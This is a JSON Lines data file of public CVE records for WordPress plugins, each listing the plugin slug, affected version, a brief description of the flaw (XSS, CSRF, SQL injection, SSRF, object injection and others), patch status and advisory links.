{"CVE_ID":"CVE-2025-6053","slug":"zuppler-online-ordering","versionImpact":"2.1.0","description":"The Zuppler Online Ordering plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.0. This is due to missing or incorrect nonce validation on the 'zuppler-online-ordering-options' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zuppler-online-ordering\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zuppler-online-ordering\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dab1dbc7-f188-4c04-9c8b-465ec0a42548?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dab1dbc7-f188-4c04-9c8b-465ec0a42548?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8622","slug":"wp-flexible-map","versionImpact":"1.18.0","description":"The Flexible Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Flexible Maps shortcode in all versions up to, and including, 1.18.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/webaware\\\/flexible-map\\\/commit\\\/1cbae2fa98e10c82d82a68e2bacfbdb7231117db\",\"name\":\"https:\\\/\\\/github.com\\\/webaware\\\/flexible-map\\\/commit\\\/1cbae2fa98e10c82d82a68e2bacfbdb7231117db\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341890\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341890\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-flexible-map\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-flexible-map\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cde79196-20aa-42f1-b35f-af347bcb6e5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cde79196-20aa-42f1-b35f-af347bcb6e5f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4835","slug":"social-sharing-toolkit","versionImpact":"2.6","description":"The Social Sharing Toolkit WordPress plugin through 2.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/23c22f46-19a2-4a1a-aaef-0a4007eda031\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/23c22f46-19a2-4a1a-aaef-0a4007eda031\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25143","slug":"gdpr-cookie-compliance","versionImpact":"4.0.2","description":"The GDPR Cookie Compliance plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the gdpr_cookie_compliance_reset_settings AJAX action in versions up to, and including, 4.0.2. This makes it possible for authenticated attackers to reset all of the settings.","refs":"[{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-gdpr-cookie-compliance-security-bypass-4-0-2\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-gdpr-cookie-compliance-security-bypass-4-0-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9116d719-f536-4b8a-9e73-9a8a922f8a35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9116d719-f536-4b8a-9e73-9a8a922f8a35?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-gdpr-cookie-compliance-plugin-fixed-authenticated-settings-deletion-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-gdpr-cookie-compliance-plugin-fixed-authenticated-settings-deletion-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ac51325-a7f5-4d38-9b41-61855206083d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ac51325-a7f5-4d38-9b41-61855206083d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4307","slug":"lock-user-account","versionImpact":"1.0.3","description":"The Lock User Account WordPress plugin through 1.0.3 does not have CSRF check when bulk locking and unlocking accounts, which could allow attackers to make logged in admins lock and unlock arbitrary users via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2020","slug":"calculated-fields-form","versionImpact":"5.1.56","description":"The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form page href parameter in all versions up to, and including, 5.1.56 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the professional version or higher.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45bfa9fb-f35b-4fd4-8553-cf87bf69df6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45bfa9fb-f35b-4fd4-8553-cf87bf69df6b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/calculated-fields-form\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/calculated-fields-form\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1324","slug":"qqworld-auto-save-images","versionImpact":"1.9.8","description":"The QQWorld Auto Save Images plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the save_remote_images_get_auto_saved_results() function hooked via a nopriv AJAX action in all versions up to, and including, 1.9.8. This makes it possible for unauthenticated attackers to retrieve the contents of arbitrary posts that may not be public.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed82f527-b7af-4466-a977-855f109ed997?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed82f527-b7af-4466-a977-855f109ed997?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qqworld-auto-save-images\\\/trunk\\\/qqworld-auto-save-images.php#L417\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qqworld-auto-save-images\\\/trunk\\\/qqworld-auto-save-images.php#L417\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5649","slug":"fusion-slider","versionImpact":"1.6.5","description":"The Universal Slider plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.6.5 via deserialization of untrusted input 'fsl_get_gallery_value' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f8bd107-5459-4093-8593-deedec6ffcd6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f8bd107-5459-4093-8593-deedec6ffcd6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fusion-slider\\\/trunk\\\/fusion-slider.php#L692\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fusion-slider\\\/trunk\\\/fusion-slider.php#L692\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6770","slug":"v-form","versionImpact":"2.1.5","description":"The Lifetime free Drag & Drop Contact Form Builder for WordPress VForm plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.1.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61a63ba6-129a-4ce2-be40-89c2fa44a670?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61a63ba6-129a-4ce2-be40-89c2fa44a670?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/v-form\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/v-form\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128079\\\/#file56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128079\\\/#file56\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128079\\\/#file58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128079\\\/#file58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128092\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128092\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10168","slug":"profit-products-tables-for-woocommerce","versionImpact":"1.0.6.4","description":"The Active Products Tables for WooCommerce. Use constructor to create tables plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's woot_button shortcode in all versions up to, and including, 1.0.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a13b13e-72d3-43c9-b5ec-d499f3b22091?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a13b13e-72d3-43c9-b5ec-d499f3b22091?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profit-products-tables-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profit-products-tables-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182136\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182136\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13055","slug":"dyn-business-panel","versionImpact":"1.0.0","description":"The Dyn Business Panel WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91178272-ed7e-412c-a187-e360a1313004\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91178272-ed7e-412c-a187-e360a1313004\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91178272-ed7e-412c-a187-e360a1313004\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91178272-ed7e-412c-a187-e360a1313004\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4220","slug":"xavins-list-subpages","versionImpact":"1.3","description":"The Xavin&#039;s List Subpages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'xls' shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xavins-list-subpages\\\/trunk\\\/xavins-list-subpages.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xavins-list-subpages\\\/trunk\\\/xavins-list-subpages.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df30f21a-cd3a-4391-9f59-81538fefabdc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df30f21a-cd3a-4391-9f59-81538fefabdc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7088","slug":"add-svg-support-for-media-uploader-inventivo","versionImpact":"1.0.5","description":"The Add SVG Support for Media Uploader | inventivo WordPress plugin through 1.0.5 does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f515e36-9072-4fc4-9d2f-d50f1adde626\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f515e36-9072-4fc4-9d2f-d50f1adde626\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5816","slug":"biteship","versionImpact":"3.2.0","description":"The Plugin Pengiriman WooCommerce Kurir Reguler, Instan, Kargo \u2013 Biteship plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.2.0 via the get_order_detail() due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view other user's orders.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/biteship\\\/trunk\\\/includes\\\/class-biteship.php#L515\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/biteship\\\/trunk\\\/includes\\\/class-biteship.php#L515\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/biteship\\\/trunk\\\/public\\\/class-biteship-public.php#L327\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/biteship\\\/trunk\\\/public\\\/class-biteship-public.php#L327\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48509d43-57bb-452c-b39b-905354a273f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48509d43-57bb-452c-b39b-905354a273f3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7670","slug":"jquery-archive-list-widget","versionImpact":"6.1.5","description":"The JS Archive List plugin for WordPress is vulnerable to time-based SQL Injection via the build_sql_where() function in all versions up to, and including, 6.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/Skatox\\\/jquery-archive-list\\\/commit\\\/1c4a5749b187cc65d2c4b192b9c9890a36bf1fd2\",\"name\":\"https:\\\/\\\/github.com\\\/Skatox\\\/jquery-archive-list\\\/commit\\\/1c4a5749b187cc65d2c4b192b9c9890a36bf1fd2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-archive-list-widget\\\/tags\\\/6.1.5\\\/classes\\\/class-jq-archive-list-datasource.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-archive-list-widget\\\/tags\\\/6.1.5\\\/classes\\\/class-jq-archive-list-datasource.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341291\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341291\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jquery-archive-list-widget\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jquery-archive-list-widget\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72857d52-ac81-4eb2-93fa-7bb03265bccf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72857d52-ac81-4eb2-93fa-7bb03265bccf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4834","slug":"cpt-bootstrap-carousel","versionImpact":"1.12","description":"The CPT Bootstrap Carousel WordPress plugin through 1.12 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6183318f-0230-47a1-87f2-3c5aaef678a5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6183318f-0230-47a1-87f2-3c5aaef678a5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1408","slug":"video-list-manager","versionImpact":"1.7","description":"The Video List Manager WordPress plugin through 1.7 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2029","slug":"prepost-seo","versionImpact":"3.0","description":"The PrePost SEO WordPress plugin through 3.0 does not properly sanitize some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4889ad5a-c8c4-4958-b176-64560490497b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4889ad5a-c8c4-4958-b176-64560490497b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5940","slug":"wp-not-login-hide-wpnlh","versionImpact":"1.0","description":"The WP Not Login Hide (WPNLH) WordPress plugin through 1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d594c00d-2905-449b-80cd-95965a96cd4b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d594c00d-2905-449b-80cd-95965a96cd4b\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1081","slug":"interactive-3d-flipbook-powered-physics-engine","versionImpact":"1.15.3","description":"The 3D FlipBook \u2013 PDF Flipbook WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bookmark feature in all versions up to, and including, 1.15.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/807eadff-b39e-4d7a-9b0a-06fc18a90626?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/807eadff-b39e-4d7a-9b0a-06fc18a90626?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038174%40interactive-3d-flipbook-powered-physics-engine&new=3038174%40interactive-3d-flipbook-powered-physics-engine&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038174%40interactive-3d-flipbook-powered-physics-engine&new=3038174%40interactive-3d-flipbook-powered-physics-engine&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5021","slug":"nimble-portfolio","versionImpact":"3.0.1","description":"The WordPress Picture \/ Portfolio \/ Media Gallery plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.0.1 via the 'file_get_contents' function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/224a2d6d-7fdc-43a8-a8c9-26213b604433?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/224a2d6d-7fdc-43a8-a8c9-26213b604433?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nimble-portfolio\\\/trunk\\\/includes\\\/prettyphoto\\\/download-image.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nimble-portfolio\\\/trunk\\\/includes\\\/prettyphoto\\\/download-image.php#L17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23887","slug":"easy-google-analytics-for-wordpress","versionImpact":"1.6.0","description":"Missing Authorization vulnerability in Shaon Easy Google Analytics for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Easy Google Analytics for WordPress: from n\/a through 1.6.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-google-analytics-for-wordpress\\\/vulnerability\\\/wordpress-easy-google-analytics-for-wordpress-plugin-1-6-0-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-google-analytics-for-wordpress\\\/vulnerability\\\/wordpress-easy-google-analytics-for-wordpress-plugin-1-6-0-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12819","slug":"searchie","versionImpact":"1.17.0","description":"The Searchie plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sio_embed_media' shortcode in all versions up to, and including, 1.17.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchie\\\/trunk\\\/SIO\\\/Shortcodes\\\/WidgetsEmbed.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchie\\\/trunk\\\/SIO\\\/Shortcodes\\\/WidgetsEmbed.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/searchie\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/searchie\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8abed8c7-0c3f-4054-a116-82ce47d605de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8abed8c7-0c3f-4054-a116-82ce47d605de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13052","slug":"dental-optimizer-patient-generator-app","versionImpact":"1.0","description":"The Dental Optimizer Patient Generator App WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/671d5eef-c496-4047-9d01-8ab8a94cdc72\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/671d5eef-c496-4047-9d01-8ab8a94cdc72\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/671d5eef-c496-4047-9d01-8ab8a94cdc72\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/671d5eef-c496-4047-9d01-8ab8a94cdc72\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4055","slug":"multiple-post-type-order","versionImpact":"1.10.0","description":"The Multiple Post Type Order plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mpto' shortcode in all versions up to, and including, 1.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/multiple-post-type-order\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/multiple-post-type-order\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b148926d-090d-4fab-991c-89105078a263?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b148926d-090d-4fab-991c-89105078a263?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7086","slug":"svg-uploads-support","versionImpact":"2.1.1","description":"The SVG Uploads Support WordPress plugin through 2.1.1 does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/94954e1a-dc09-4811-b57d-b12bf69a767d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/94954e1a-dc09-4811-b57d-b12bf69a767d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
